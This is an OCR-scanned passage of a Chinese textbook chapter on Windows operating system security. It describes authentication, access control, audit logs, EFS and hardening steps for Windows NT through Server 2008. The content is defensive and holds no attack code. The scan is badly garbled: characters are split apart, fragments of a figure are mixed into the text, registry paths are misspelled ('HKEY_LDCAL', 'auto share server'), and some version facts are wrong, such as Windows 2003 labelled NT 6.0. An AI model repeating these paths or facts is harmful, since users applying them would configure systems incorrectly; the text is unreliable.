息 。 这 些 都 需要 一 个 机 制 保障 用 户 和 内 核 的 通信 过 程 ,这 样 的 机 制 就 是 由 可 信 通 路 提供 的 。 

操作 系统 安全 的 实施 将 保护 计算 机 硬件 .软件 和 系统 数据 ,防止 人 为 因素 造成 的 故障 和 
破坏 。 因 此 ,提高 操作 系统 本 身 的 安全 等 级 尤为 重要 。 它 包括 如 下 几 个 方面 。 

(1) 身份 鉴别 机 制 : 实施 强 认证 方法 ,比如 数字 证 书 等 。 

(2) 访问 控制 机 制 : 实施 细 粒 度 的 用 户 访问 控制 、 细 化 访问 权限 等 。 

(3) 完整 性 : 防止 数据 系统 被 恶意 代码 比如 病毒 破坏 ,对 关键 信息 进行 数字 签名 技术 
保护 。 

(4) 系统 的 可 用 性 : 不 能 访问 的 数据 等 于 不 存在 ,不 能 工作 的 业务 进程 毫 无 用 处 。 因 
此 还 要 加 强 应 对 攻击 的 能 力 ,比如 病毒 防范 .抵御 黑客 和 人 侵 等 。 

6. 审计 

审计 是 一 种 有 效 的 保护 措施 , 它 可 以 在 一 定 程度 上 阻止 对 信息 系统 的 威胁 ,并 在 系统 监 
测 ,故障 恢复 等 方面 发 挥 重 要 的 作用 。 
3.1.2 Windows 系统 安全 

Windows 系统 是 微软 公司 研究 开发 的 操作 系统 ,其 发 展 经 历 了 Windows 3. 1、 
Windows 98 .Windows NT、Windows 2000、Windows XP、Windows 2003、Windows 2008 和 
Windows Vista 等 多 个 版 本 。 由 于 Windows 系统 的 易 用 性 ,许多 用 户 都 使 用 它 , 特 别 是 其 
桌面 操作 系统 。 系 统 除 了 在 操作 方面 的 简单 易 用 和 稳定 性 外 ,其 安全 机 制 也 是 比较 完善 的 。 
以 下 是 Windows 系统 的 安全 机 制 介绍 。 

1. Windows 认证 机 制 

早期 Windows 系统 的 认证 机 制 不 是 很 完善 .甚至 缺乏 认证 机 制 。 如 Windows 3. x、 
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Windows 95/98 等 。 随 着 技术 的 进步 ,认证 机 制 逐 步 完 善 。 在 Windows 2000 中 ,系统 就 提 
供 了 两 种 认证 方式 , 即 本 地 认证 和 网 络 认证 。 
2. Windows 访问 控制 机 制 


Windows NT/XP 的 安全 性 达到 了 橘 皮 书 (可 信 计 算 机 系统 评测 标准 TCSEC)C2 级 ， 
实现 了 用 户 级 自主 访问 控制 。 其 访问 控制 机 制 如 , 
上 用 户 进程 
图 3-1 所 示 。 
上 Pi 


， 十 二 二 许可 诸 求 
3. Windows 审计 /日 志 机 制 许可 请 求 “>[ 去 不 多 区 


日 志文 件 是 Windows 系统 中 一 个 比较 特殊 的 模块 授 了 许可 监督 器 SRM 
文件 , 它 记 录 Windows 系统 运行 状况 ,如 各 种 系统 服 执行 访问 


务 的 启动 .运行 和 关闭 等 信息 。Windows 系统 日 志 | 客体 对 象 
有 三 种 类 型 : 系统 日 志 、 应 用 程序 日 志和 安全 日 志 ， 
它们 对 应 的 文件 名 为 SysEvent. evt、AppEvent. evt 和 
SecEvent. evt。 这 些 日 志文 件 通 常 存放 在 操作 系统 安装 区 域 “system32\config” 目 录 下 。 

4. Windows 协议 过 滤 和 防火 墙 

由 于 网 络 上 的 安全 威胁 日 趋 严重 , Windows NT 4.0、Windows 2000、Windows 2003、 
Windows 2008 等 均 提供 了 包 过 滤 机 制 ,通过 过 滤 机 制 可 以 限制 网 络 中 的 数据 包 进 入 计算 
机 。 而 Windows XP 自 带 了 防火 墙 , 它 能 够 实现 监控 和 限制 用 户 计算 机 的 网 络 通信 。 

5. Windows 文件 加 密 系统 

为 了 防范 入 侵 者 通过 物理 途径 读 取 磁盘 信息 ,而 不 是 通过 Windows 系统 文件 访问 ， 
Microsoft 开发 了 加 密 的 文件 系统 EFS, 利 用 EFS, 文 件 中 的 数据 在 磁盘 上 是 加 密 的 。 用 户 
如 果 访 问 加 密 的 文件 , 则 必须 拥有 这 个 文件 的 KEY ,这 个 文件 才能 被 打开 , 像 其 他 普通 文档 
一 样 。EFS 加 密 是 基于 公 钥 策略 。 被 EFS 加 密 过 的 数据 不 能 在 Windows 中 直接 共享 。 如 
果 通 过 网 络 传输 经 EFS 加 密 过 的 数据 ,这 些 数据 在 网 络 上 将 会 以 明文 的 形式 传输 。NTFS 
分 区 上 保存 的 数据 还 可 以 被 压缩 ,但 是 一 个 文件 不 能 同时 被 压缩 和 加 密 。 

虽然 Windows 系统 已 经 有 了 一 定 的 安全 机 制 ,但 是 各 种 各 样 的 网 络 攻击 仍 层出不穷 ， 
考验 着 系统 的 安全 与 稳定 。 现 在 系统 面临 的 主要 威胁 有 以 下 几 点 。 

(1) Windows 口令 的 安全 。 

(2) Windows 恶意 代码 。 

(3) 应 用 软件 漏洞 。 

(4) 系统 程序 的 漏洞 。 

(5) 注册 表 安 全 。 

(6) 文件 共享 安全 。 

(7) 物理 临近 攻击 。 

针对 这 些 威胁 ,Windows 系统 提出 了 以 下 的 安全 增强 方法 。 

(1) 安全 漏洞 打 补 丁 。 由 于 很 多 漏洞 本 质 上 都 是 软件 设计 时 的 缺陷 和 错误 ,因此 需要 


图 3-1 Windows 访问 控制 机 制 


修复 。 
(2) 停止 服务 和 伯 载 软件 。 
(3) 升级 或 更 换 程序 。 
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(4) 修改 配置 或 权限 。 

(5) 去 除 特洛伊 木马 等 恶意 程序 。 

(6) 安装 可 用 的 安全 工具 软件 。 

1. Windows NT 系统 安全 

Windows NT(New Technology ) 是 微软 公司 第 一 个 真正 意义 上 的 网 络 操作 系统 , 它 的 发 展 
经 过 Windows NT 3.0/NT 4.0/NT 5.0(Windows 2000) 和 Windows NT 6. 0(Windows 2003) 
等 众多 版 本 ,并 逐步 占据 了 广大 中 小 网 络 操作 系统 的 市 场 。 

Windows NT 众多 版 本 的 操作 系统 使 用 了 与 Windows 9x 完全 一 致 的 用 户 界 面 和 完全 
相同 的 操作 方法 ,使 用 户 使 用 起 来 比较 方便 。 与 Windows 9x 相 比 ,Windows NT 的 网 络 功 
能 更 加 强大 并 且 安 全 。 

Windows NT 系列 操作 系统 具有 以 下 三 方面 的 优点 。 

1) 支持 多 种 网 络 协议 

由 于 网 络 中 可 能 存在 多 种 客户 机 ,这 些 客户 机 可 能 使 用 了 不 同 的 网 络 协议 ,如 TCP/ 
IP,IPX/SPX 等 。 但 Windows NT 系统 支持 几乎 所 有 常见 的 网 络 协议 。 

2) 内 置 Internet 服务 

随 着 互联 网 发 展 和 TCP/IP 协议 簇 的 标准 化 ,Windows NT 操作 系统 内 置 了 IIS, 可 以 
使 用 户 轻松 地 配置 各 种 网 络 服务 。 

3) 支持 NTFS 文件 系统 

Windows 9x 使 用 的 文件 系统 是 FAT, 在 NT 中 内 置 同时 支持 FAT 和 NTFS 的 磁盘 分 
区 格式 。FAT32 文件 仅 提供 了 文件 夹 的 安全 控制 ,而 NTFS 文件 系统 同时 具备 了 安全 性 和 
稳定 性 ,并 且 能 设置 文件 和 文件 夹 的 安全 性 。 全 32 位 内 核 的 NTFS 为 磁盘 目录 与 文件 提 
供 安全 设置 ,指定 访问 权限 。NTFS 自动 记录 与 文件 相关 的 变动 操作 ,具有 文件 修复 能 力 。 
NTFS 文件 系统 每 篮 仅 为 512B, 硬 盘 利用 率 最 高 。 但 是 NTFS 也 有 自己 不 足 的 地 方 , 它 的 
兼容 性 差 。NTFS 可 以 访问 FAT 文件 系统 ,但 是 反 向 操作 无 法 进行 。 目 前 支持 NTFS 分 
区 格式 的 系统 不 多 ,除了 NT 外 ,Windows 2000、Windows XP、Windows 2003、Windows 
2008 系统 也 支持 这 种 文件 系统 形式 。 

2. Windows 2000 系统 安全 

Windows 2000 起 初 称 为 Windows NT 5.0, 它 综合 了 Windows 98 和 Windows NT 4.0 的 
很 多 优点 和 性 能 ,Windows 2000 系统 具有 如 下 安全 特性 。 

1) 活动 目录 

Windows 2000 Server 在 Windows NT Server 4.0 的 基础 上 ,进一步 发 展 了 活动 目录 
(Active Directory)。 活 动 目录 是 从 一 个 数据 存储 开始 的 。 它 采用 的 是 Exchange Server 的 
数据 存储 , 称 为 Extensible Storage Service(ESS)。 其 特点 是 不 需要 事先 定义 数据 库 的 参 
数 ,可 以 做 到 动态 地 增长 ,性 能 非常 优良 。 活动 目 录 包 括 两 个 方面 : 一 个 目录 和 与 目录 相关 
的 服务 。 目 录 是 存储 各 种 对 象 的 物理 容器 ; 而 目录 服务 是 使 目录 中 的 所 有 信息 和 资源 发 挥 
作用 的 服务 。 活 动 目 录 是 一 个 分 布 式 的 目录 服务 。 信 息 可 以 分 散在 多 台 不 同 的 计算 机 上 ， 
保证 快速 访问 和 容错 ; 同时 用 户 可 以 在 任何 地 方 访问 ,为 用 户 提供 统一 的 视图 。 

2) 文件 系统 

Windows 2000 在 Windows NT Server 4. 0R 高 效 文件 服务 基础 上 ,加 强 和 新 增 了 分 布 
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式 文件 系统 、 用 户 配 额 \, 加 密 文件 系统 、 磁 盘 碎片 整理 和 索引 服务 等 服务 。 分 布 式 文件 系统 
帮助 实现 了 不 管 文件 的 物理 分 布 情况 都 把 文件 组 织 成 树 状 的 分 层次 逻辑 结构 ,便于 访问 ,加 
强 了 容错 能 力 。Windows 2000 采用 NTFS 5 的 文件 系统 , 它 改 善 了 NTFS 4 的 访问 许可 权 
限 。 它 增加 了 两 个 特别 访问 许可 : 权限 改变 和 拥有 所 有 权 。Windows 2000 分 布 式 网 络 环 
境 中 ,增加 了 一 个 管理 文件 存储 增长 问题 的 新 工具 : 磁盘 配额 。 它 允许 管理 员 根 据 文件 或 
文件 夹 的 所 有 权 来 向 用 户 分 配 磁盘 空间 ,还 可 以 设 定 警报 和 观察 用 户 所 剩 的 磁盘 空间 。 加 
密 文 件 系统 是 在 磁盘 上 存储 NTFS 文件 的 一 种 新 的 加 密 存 储 方式 。 

3) 存储 服务 

Windows 2000 中 使 用 的 存储 管理 体现 在 动态 磁盘 卷 管理 .磁盘 碎片 整理 和 自动 系统 恢 
复 等 方面 。Windows 2000 还 设计 了 通过 层次 性 存储 管理 支持 新 兴 存 储 访问 协议 等 方法 来 
降低 存储 的 成 本 。 层 次 性 存储 管理 是 建立 在 远程 存储 服务 之 上 的 ,能 够 不 增加 磁盘 就 可 以 
在 服务 器 上 增加 新 的 自由 存储 空间 。 

4) 数据 和 通信 安全 

在 数据 和 通信 安全 方面 ,Windows 2000 实现 了 如 下 的 特征 : 数据 安全 性 、 企 业 间 通信 
的 安全 性 ,企业 和 Internet 的 单 点 安全 登录 以 及 易 用 和 良好 扩展 性 的 安全 管理 。Windows 
2000 保证 数据 安全 的 方法 通过 以 下 三 个 方面 实现 : 用 户 登 录 时 的 安全 性 ,网 络 数 据 的 保 
护 , 存 储 数据 的 保护 。 

虽然 Windows 2000 系统 在 安全 方面 又 做 了 很 大 改进 ,但 是 仍然 存在 一 些 安全 隐患 ,下 
面 介绍 一 些 增强 系统 安全 的 技术 。 

1) 系统 启动 安全 增强 

非法 用 户 若 能 以 软盘 及 光盘 启动 计算 机 , 那 他 就 可 以 在 DOS 系统 下 随意 对 系统 进行 攻 
击 。 因 此 用 户 必须 关闭 软盘 及 光盘 的 启动 功能 。 

2) 账号 与 口令 管理 安全 增强 

在 Windows 2000 系统 中 用 户 账 户 有 两 种 : 活动 目录 用 户 账 户 和 计算 机 账户 。 用 户 账 
户 是 用 来 记录 用 户 的 用 户 名 和 口令 .隶属 的 组 .可 以 访问 的 网 络 资源 ,以 及 用 户 的 个 人 文件 
和 设置 。 每 个 用 户 都 应 在 域 控制 器 中 有 一 个 用 户 账户 ,才能 访问 服务 器 ,使 用 网 络 上 的 资源 。 
用 户 账户 由 一 个 “用 户 名 ”和 一 个 “口令 ”来 标识 ,二 者 都 需要 用 户 在 登录 时 输入 。Windows 
2000 提供 可 用 于 登录 到 Windows 2000 计算 机 的 预定 义 用 户 账户 。 账 户 通常 分 为 两 类 : 管 
理 员 账 户 和 客户 账户 。 每 个 预定 义 账户 有 不 同 的 权利 和 权限 组 合 ,所 以 要 合理 使 用 和 严格 
管理 。 计 算 机 账户 是 指 每 个 加 入 域 的 Windows 2000 系统 的 计算 机 都 应 具有 的 账户 。 一 个 
加 入 域 的 计算 机 账户 ,可 拥有 多 个 用 户 账户 , 且 在 不 同 的 计算 机 上 使 用 自己 的 用 户 账户 进行 
网 络 登 录 。 账 号 和 口令 经 常 成 为 人 侵 者 入 侵 系 统 的 突破 口 ,账号 越 多 ,危险 越 大 。 因 此 要 加 
强 用 户 账号 的 管理 。 

加 强 用 户 账户 管理 的 方法 如 下 。 

(1) 停 用 Guest 账户 。 在 计算 机 管理 的 用 户 里 面 把 Guest 账户 停 用 ,任何 时 候 都 不 允 
许 Guest 账户 登录 系统 。 

(2) 限制 不 必要 的 用 户 数 量 。 去 掉 所 有 的 duplicate user 账户 。 

(3) 把 系统 Administrator 账号 改名 。 

(4) 创建 一 个 陷阱 账号 。 创 建 一 个 Administrator 的 本 地 账号 ,把 它 的 权限 设 为 最 低 ， 
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并 设 一 个 超 复杂 的 口令 。 

(5) 设置 安全 复杂 的 口令 。 

(6) 设置 屏幕 保护 口令 。 这 是 防止 内 部 人 员 随 意 进 入 系统 的 一 个 屏障 。 

(7) 不 让 系统 显示 上 次 登录 的 用 户 名 。 

Windows 系统 资源 安全 管理 也 是 系统 安全 很 重要 的 方面 ,可 以 通过 下 面 的 设置 来 提高 
系统 的 安全 性 。 

(1) 共享 权限 的 修改 。 在 系统 默认 情况 下 ,每 建立 一 个 新 的 共享 ,Everyone 用 户 就 享 
有 “完全 控制 ?的 共享 权限 ,因此 ,在 建立 新 的 共享 后 应 该 立即 修改 Everyone 的 默认 权限 。 

(2) 注册 表 安 全 。Windows 2000 中 很 多 安全 设置 ,都 要 通过 注册 表 来 进行 ,所 以 要 保 
证 注册 表 的 安全 。 

对 于 Windows 系统 网 络 安全 管理 方面 ,可 以 通过 下 面 的 方法 提高 系统 的 安全 性 。 

(1) 系统 补丁 。 

(2) 禁止 空 连接 。 默 认 情 况 下 ,任何 用 户 可 以 通过 空 连接 连 上 服务 器 ,进而 枚 举 出 账 
号 ,猜测 口令 。 

(3) 关闭 不 必要 的 网 络 服务 和 网 络 端口 。 

过 多 的 网 络 服务 和 端口 的 开放 增加 了 系统 的 安全 风险 ,为 此 应 尽量 避免 打开 不 必要 的 
服务 和 端口 。 

3. Windows Server 2003 系统 安全 


在 Windows 2000 基础 上 改进 而 来 的 Windows 2003, 因 其 操作 方便 ,功能 强大 ,成 为 一 
段 时 间 内 服务 器 操作 系统 的 主流 。 在 安全 方面 , Windows 2003 的 安全 模型 发 挥 了 巨大 作用 。 

(1) Windows 2003 安全 模型 的 功能 

@ 身份 验证 。Windows Server 2003 进行 身份 验证 时 分 两 部 分 执行 : 交互 式 登录 和 网 
络 身份 验证 。 

@ 访问 控制 。 访 问 控制 是 批准 用 户 、 组 和 计算 机 访问 网 络 上 的 对 象 的 过 程 。 

@ 加 密 文件 系统 (EFS) 。 继 续 延续 Windows 2000 的 这 一 技术 ,其 对 加 密 文件 的 用 户 
是 透明 的 , 即 此 用 户 在 使 用 该 加 密 文件 时 不 用 手动 解密 。 

@ 公 钥 基础 结构 。 

@@ Internet 协议 安全 性 (IPSec) 。 它 通过 使 用 加 密 的 安全 服务 以 确保 在 Internet 协议 
网 络 上 进行 保密 和 安全 的 通信 。 

(2) Windows Server 2003 中 存在 的 安全 问题 

在 安装 的 过 程 中 ,存在 下 面 的 安全 隐患 。 

g@ 在 接 入 网 络 时 进行 系统 安装 。 因 为 在 安装 中 , 当 输 入 Administrator 密码 后 ,系统 就 
会 自动 建立 ADMIN $ 的 共享 。 任 何人 都 可 以 通过 ADMIN $ 进入 系统 。 

@ 操作 系统 与 应 用 系统 共用 一 个 磁盘 分 区 。 当 二 者 装 在 一 个 分 区 时 ,将 导致 一 旦 操作 
系统 文件 泄漏 ,攻击 者 可 能 获取 应 用 系统 的 访问 权限 ,从 而 影响 应 用 系统 的 安全 。 

@ 采用 默认 安装 。 默 认 安 装 时 可 能 会 安装 一 些 安全 隐患 的 组 件 。 

@ 系统 补丁 安装 不 及 时 ,不 全 面 。 

在 系统 运行 的 过 程 中 ,仍然 存在 一 些 安全 隐患 。 
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@ 默认 共享 : 系统 在 运行 后 ,会 自动 创建 一 些 隐 藏 的 共享 。 一 般 有 以 下 几 个 共享 文 
件 : C$D$E$ 每 一 个 分 区 的 根 共 享 目录 ; ADMIN $ 远程 管理 用 的 共享 目录 ; IPCS 空 连接 
NetLogon 共享 。 

@ 默认 服务 : 系统 在 运行 后 ,自动 启动 了 许多 有 安全 隐患 的 服务 ,如 Telnet、Remote 
Registry Services 等 ,这 些 服 务实 际 工作 中 如 不 需要 ,可 以 禁用 。 

@ 安全 策略 : 默认 下 ,安全 策略 是 不 起 作用 的 。 

@ 管理 员 账 号 : 在 系统 运行 后 ,Administrator 账号 没有 停 用 ,攻击 者 可 能 一 遍 一 遍 尝 
试 这 个 账号 的 口令 。 

@ 页 面 文件 : 页 面 文件 用 来 存储 没有 装 和 内存 的 程序 和 数据 文件 部 分 的 隐藏 文件 ,其 
中 可 能 含有 敏感 信息 。 

@@ 共享 文件 : 默认 状态 下 ,每 个 人 对 新 创建 的 文件 共享 都 拥有 完全 的 控制 权限 ,这 是 
不 安全 的 ,应 该 严格 控制 用 户 的 访问 权限 。 

@ Dump 文件 : Dump 文件 在 系统 崩溃 后 和 蓝屏 的 时 候 是 一 份 很 有 用 的 查找 问题 的 资 
料 , 但 同时 也 会 给 攻击 者 提供 一 些 敏感 信息 。 

Web 服务 : 系统 本 身 自 带 的 IIS 服务 .FTP 服务 存在 安全 隐患 。 

(3) 针对 上 面 提 到 的 安全 隐患 可 以 执行 的 安全 防范 措施 

Q@ 关闭 系统 默认 共享 。 

方法 1: 采用 批 处 理 文件 在 系统 启动 时 自动 删除 共享 。 

方法 2: 修改 注册 表 , 禁 止 默认 的 共享 功能 。 

HKEY_LDCAL MACHINE\SYSTEM\CurrentControlSet\Services\Lanmanserver\ 
parameter 下 新 建 一 个 双 字 节 项 auto share server, 设 其 值 为 0 即 可 。 

@ 关闭 不 必要 的 服务 。 如 DHCP Client, DNS Client, Print spooler, Remote Registry 
Services,SNMP Services 等 。 

@ 启用 安全 策略 。 包 括 账号 锁定 策略 ,密码 策略 ,审核 策略 ,用 户 权 限 分 配 , 安 全 选项 。 
其 中 开启 审核 策略 是 系统 最 基本 的 入 侵 检测 方法 。 下 面 的 审核 是 必须 开启 的 : 审核 系统 登 
录 事 件 .审核 账户 管理 .审核 登录 事件 、 审 核对 象 访问 、 审 核 策略 更 改 、 审 核 特权 使 用 和 审核 
系统 事件 。 

@ 加 强 对 Administrator 账号 和 Guest 账号 的 管理 控制 。 

@ 清除 页 面 文件 。 打 开 注 册 表 ,修改 下 面 所 示 键 的 值 : 

HKEY_LDCAL_ MACHINE\SYSTEM\ CurrentControlSet\ Control Session Manager\ 
MemoryManagement 中 的 ClearPageFileAtShutdown 的 值 改 为 1, 可 以 防止 系统 产生 页 面 
交 件 。 

@ 清除 Dump 文件 。 打 开 “ 控 制 面板 ”一 双击 “系统 ”> 打开 “系统 属性 ”一 单 击 “ 高 级 ”一 
单 击 “ 启 动 和 故障 恢复 ”选项 区 域 中 的 “设置 "一 将 “ 写 入 调试 信息 ” 改 成 “无 ”。 

@ 防范 NetBIOS 漏洞 攻击 。 关 闭 139 服务 端口 。 

加 强 IIS 服务 器 的 安全 。 

4. Windows XP 系统 安全 

Windows XP 版 本 作为 Windows 系列 中 个 人 计算 机 用 户 的 系统 ,具有 运行 可 靠 、 稳 定 
而 且 速 度 快 的 特点 。 成 熟 的 技术 支持 ,清新 明快 的 外 观 设计 ,使 用 户 有 着 良好 的 视觉 享受 。 
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个 人 用 户 使 用 的 Windows XP 包括 专业 版 (Professional Edition) 和 家 庭 版 (Home Edition) 。 两 
个 版 本 基本 相同 ,专业 版 只 是 额外 增加 了 适用 于 企业 网 络 用 户 和 高 级 用 户 的 特性 。 

Windows XP 继续 延续 Windows 系列 的 安全 机 制 ,体现 在 安装 安全 策略 、 账 号 安全 策 
略 .应 用 安全 策略 .网 络 安全 策略 等 方面 。 下 面 仅 针对 系统 服务 和 进程 的 问题 进行 说 明 。 

1) 完善 的 用 户 管理 功能 

Windows XP 采用 Windows 2000/NT 的 内 核 , 在 用 户 管理 上 非常 安全 。 几 是 增加 的 用 
户 都 可 以 在 登录 的 时 候 看 到 ,不 像 Windows 2000 那样 ,被 黑客 增加 了 一 个 管理 员 组 的 用 户 
都 发 现 不 了 。 使 用 NTFS 文件 系统 可 以 通过 设置 文件 夹 的 安全 选项 来 限制 用 户 对 文件 夹 
的 访问 ,如 某 普通 用 户 访问 另 一 个 用 户 的 文档 时 会 提出 警告 。 还 可 以 对 某 个 文件 (或 者 文件 
夹 ) 启 用 审核 功能 ,将 用 户 对 该 文件 (或 者 文件 夹 ) 的 访问 情况 记录 到 安全 日 志文 件 中 , 进 一 
步 加 强 对 文件 操作 的 监督 。 

拥有 Administrator 权限 的 用 户 ,打开 命令 提示 符 窗口 ,输入 “net start” 命 令 后 ,就 可 看 
到 已 经 开启 的 系统 服务 。 如 果 为 了 详细 查看 ,可 以 在 “运行 "里 面 输入 “services. msc”, 打 开 
服务 设置 窗口 。 服 务 分 为 三 种 启动 类 型 : 自动 .手动 .已 禁用 。 

2) 透明 的 软件 限制 策略 

在 Windows XP 中 ,软件 限制 策略 以 “透明 ”的 方式 来 隔离 和 使 用 不 可 靠 的 、 潜 在 的 对 用 
户 数据 有 危害 的 代码 ,这 可 以 保护 用 户 的 计算 机 免 受 各 种 通过 电子 邮件 或 网 页 传播 的 病毒 、 
木马 程序 和 蠕虫 等 的 侵害 ,保证 了 数据 的 安全 。 

3) 支持 NTFS 文件 系统 以 及 加 密 文件 系统 

Windows XP 里 的 加 密 文件 系统 (EFS) 基 于 公众 密 钥 ,并 利用 CryptoAPI 结构 默认 的 
EFS 设置 , EFS 还 可 以 使 用 扩展 的 Data Encryption Standard (DESX) 和 Triple-DES 
(3DES) 作为 加 密 算 法 。 用 户 可 以 轻松 地 加 密 文件 。 

加 密 时 ,EFS 自动 生成 一 个 加 密 密 钥 。 当 用 户 加 密 一 个 文件 夹 时 ,文件 夹 内 的 所 有 文 
件 和 子 文件 夹 都 被 自动 加 密 了 ,数据 就 会 更 加 安全 。 

4) 安全 的 网 络 访问 特性 

新 的 特性 主要 表现 在 以 下 几 个 方面 。 

(1) 补丁 自动 更 新 ,为 用 户 “ 减 负 ”。 

(2) 系统 自 带 Internet 连接 防火 墙 。 

自 带 了 Internet 防火 墙 ,支持 LAN、VPN 拨号 连接 等 。 支 持 “ 自 定义 设置 ?以 及 “日 志 
查看 ”, 为 系统 的 安全 筑 起 了 一 道 “ 黑 客 防线 ”。 

(3) 关闭 “后 门 ”。 

在 以 前 的 版 本 中 ,Windows 系统 留 着 几 个 “后 门 ”, 如 137、138、139 等 端口 都 是 “敞开 大 
门 ” 的 ,在 Windows XP 中 这 些 端 口 是 关闭 的 。 

5. Windows 7 系统 安全 

相对 于 Windows XP 和 Vista, Windows 7 的 性 能 有 着 显著 的 改进 ,但 是 它们 的 操作 方 
式 却 极为 相近 。Windows 7 具有 一 个 全 新 的 .时 瞩 的 用 户 界面 外 观 和 许多 的 新 功能 ,“ 尝 
新 鲜 事物 ”, 这 也 是 很 多 用 户 选 择 Windows 7 的 原因 。 

1) 保护 内 核 

内 核 是 操作 系统 的 核心 ,这 也 使 得 它 成 为 恶意 软件 和 其 他 攻击 的 主要 目标 。 如 果 攻 击 
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者 能 够 访问 或 操控 操作 系统 的 内 核 ,那么 他 们 可 以 在 其 他 应 用 程序 甚至 操作 系统 本 身 都 无 
法 检测 到 的 层次 上 执行 恶意 代码 。 微 软 开 发 了 “内 核 模式 保护 ”来 保护 核心 ,并 确保 不 会 出 
现 未 获 授权 的 访问 。 

2) 更 安全 的 网 页 浏览 

Windows 7 附带 了 功能 更 为 强大 的 网 页 浏览 器 IE8。 用 户 也 可 以 在 其 他 的 Windows 
操作 系统 版 本 上 下 载 并 运行 IE8, 所 以 它 不 是 专用 于 Windows 7 的 ,但 它 确 实 带 来 了 一 些 安 
全 性 能 上 的 提升 。 

首先 ,InPrivate 浏览 方式 提供 了 私密 上 网 的 能 力 , 就 像 in private( 私 下 地 ) 这 个 名 字 它 
所 揭示 的 一 样 。 当 启动 一 个 InPrivate 浏览 窗口 时 ,IE 浏览 器 不 会 保存 个 人 网 上 冲浪 的 任 
何 相关 信息 。 这 意味 着 ,用 户 所 输入 的 信息 不 会 保存 在 cache 中 ,也 没有 历史 信息 记录 用 户 
访问 过 的 网 站 。 当 用 户 在 一 台 共享 或 者 公共 的 计算 机 上 使 用 IE8 时 (比如 在 图 书馆 ), 这 项 
功能 就 显得 特别 有 用 。 

IE8 另 一 个 安全 上 的 改进 是 保护 模式 。 保 护 模式 的 实现 是 基于 Windows 7 的 安全 组 
件 ,这 些 组 件 能 够 确保 恶意 或 未 经 授权 的 代码 不 会 被 允许 在 浏览 器 上 和 运行。 保护 模式 会 阻 
止 drive-by 下 载 攻击 ,这些 攻击 使 得 用 户 在 访问 某 个 被 攻破 的 网 站 时 就 能 安装 恶意 软件 到 
用 户 的 系统 中 。 

3) 保护 机 制 

用 户 账户 控制 (UAC) 是 Windows Vista 上 一 个 让 所 有 人 爱 恨 交织 的 。 使 用 Windows 7 
时 ,UAC 仍然 存在 ,但 微软 增加 了 一 个 控制 滑 杆 ,建议 用 户 使 用 UAC 提供 的 保护 一 一 这 样 
就 使 弹出 式 对 话 框 的 数量 受 允许 访问 和 执行 文件 数量 的 限制 。 

弹出 对 话 框 只 是 UAC 所 能 做 的 能 被 看 到 的 很 小 的 一 个 方面 。 在 Windows Vista 下 ， 
许多 用 户 只 是 简单 地 禁用 全 部 UAC, 但 那样 也 关闭 了 保护 模式 IE 和 一 些 其 他 的 操作 系统 
的 保护 。 在 Windows 7 下 的 滑 杆 被 默认 设置 为 和 Windows Vista 相同 的 保护 方式 ,但 用 户 
可 以 在 控制 面板 下 对 它 进行 自 定义 设置 。 

4) 安全 工具 和 应 用 软件 

Windows 防火 墙 和 Windows Defender 反 间 谍 软 件 工 具 包 含 在 Windows 7 的 基本 安装 
包 中 。 也 可 以 下 载 并 安装 Microsoft Security Essentials, 这 是 一 个 微软 发 布 的 免费 反 病 毒 

品 。 

5) 监控 Action Center 

Windows XP 用 户 所 熟悉 的 安全 中 心 已 被 Windows Action Center 所 取代 。Action 
Center 是 一 个 包括 安全 中 心 的 、 更 全 面 的 监控 Windows 7 系统 的 控制 台 。 

该 Action Center 的 安全 部 分 提供 了 用 户 Windows 7 系统 的 涉及 安全 的 粗略 信息 。 建 
议 随 时 对 有 关 防 火 墙 、 间 谍 软 件 和 病毒 软件 、Windows 的 更 新 状态 、Internet 安全 设置 和 
UAC 的 信息 进行 监控 。 

6. Windows Server 2008 系统 安全 

大 多 数 的 Windows Server 2008 都 同时 拥有 32 位 和 64 位 两 个 版 本 , Windows Server 
2008 for Itanium-based Systems 支持 IA-64 处 理 器 。Windows Server 2008 是 Microsoft 最 
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后 一 个 支持 32 位 服务 器 的 操作 系统 。 下 面 是 Windows Server 2008 版 本 类 型 , 它 延 续 了 
Windows Server 2003 的 版 本 命名 方式 : 

Windows Server 2008 Standard( 简 体 中 文正 式 零 售 标准 版 ) 

Windows Server 2008 Enterprise( 简 体 中 文正 式 企 业 版 ) 

Windows Server 2008 Datacenter (简体 中 文正 式 数据 中 心 版 ) 

Windows Web Server 2008( 简 体 中 文正 式 网 站 服务 器 版 ) 

Windows Server 2008 for Itanium-Based Systems( 简 体 中 文正 式 安 腾 版 ) 

Windows Server 2008 的 主要 特点 如 下 。 

1) Server Core 

作为 服务 器 操作 系统 , Windows Server 一 直 以 来 颇 为 诉 病 的 地 方 就 是 , 它 是 “Windows”， 
因为 管理 员 根 本 不 需要 安装 图 书 驱动 .DirectX、ADO、OLE 等 东西 , 毕 竞 他 们 不 需要 运行 用 
户 程序 ; 而 且 ,图形 用 户 界 面 一 直 是 影响 Windows 稳定 性 的 重要 因素 ,精简 了 的 图 形 用 户 
界面 可 以 减少 内 存 资源 占用 ,增强 稳定 性 和 安全 性 。 

Windows Server 2008 当中 最 引 人 注 意 的 地 方 是 它 办 新 的 安装 模式 ,在 安装 时 必须 多 
许 服 务 器 的 管理 员 选 择 安装 整个 服务 器 软件 ,或 者 只 安装 “服务 器 核心 (Server Core)”。 

“服务 器 核心 ”是 一 种 恢复 到 从 前 的 安装 方式 ,没有 图 形 用 户 界 面 (GUD ,所 有 的 设置 与 
维护 都 是 由 命令 控制 ,或 者 是 利用 Microsoft Management Console 进行 远程 联机 操作 。“ 服 
务 器 核心 ”同时 也 不 会 内 置 Internet Explorer 等 其 他 许多 与 核心 服务 不 相干 的 功能 。 

2) PowerShell 

PowerShell 原 计 划 作 为 Windows Vista 的 一 部 分 ,但 只 是 作为 免费 下 载 的 增强 附件 ， 
随后 又 成 了 Exchange Server 2007 的 关键 组 件 , 后 来 又 被 集成 到 Windows Server 2008 中 。 
这 个 新 的 命令 行 工 具 可 以 作为 图 形 用 户 界面 管理 的 补充 ,也 可 以 彻底 取代 它 。 

3) 虚拟 化 

以 往 在 企业 级 虚拟 化 领域 ,VMware 的 ESX Server、Citrix 的 XenServer 等 平台 受 关注 
的 程度 几乎 很 高 。Hyper-V 是 微软 伴随 Windows Server 2008 最 新 推出 的 服务 器 虚拟 化 
解决 方案 ,与 微软 自家 的 Virtual PC、Virtual Server 等 产品 相 比 ,有 着 很 显著 的 区 别 。 与 
Virtual Server 要 经 过 三 层 的 转换 相 比 ,Hyper-V 的 基本 架构 简化 了 虚拟 机 和 硬件 之 间 的 
